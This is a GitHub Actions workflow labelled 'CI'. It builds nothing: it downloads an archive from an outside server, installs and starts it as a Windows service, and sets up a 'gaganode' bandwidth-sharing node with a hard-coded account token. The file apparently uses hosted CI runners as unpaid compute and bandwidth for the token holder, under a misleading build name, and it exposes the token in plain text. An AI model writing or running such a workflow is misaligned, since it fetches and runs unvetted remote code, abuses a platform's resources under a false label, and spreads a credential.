name: CI

on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download
      run: Invoke-WebRequest https://assets.coreservice.io/public/package/20/app/1.0.3/app-1_0_3.tar.gz -OutFile app-windows-amd64.tar.gz
    - name: Extract
      run: Expand-Archive app-windows-amd64.tar.gz
    - name: Install
      run: .\app-windows-amd64\app.exe service install
    - name: Start
      run: .\app-windows-amd64\app.exe service start
    - name: SetAddress
      run: .\app-windows-amd64\apps\gaganode\gaganode.exe config set --token=qvaxpcypacrdqtksfjiuwiyl
    - name: Restart
      run: .\app-windows-amd64\app.exe restart
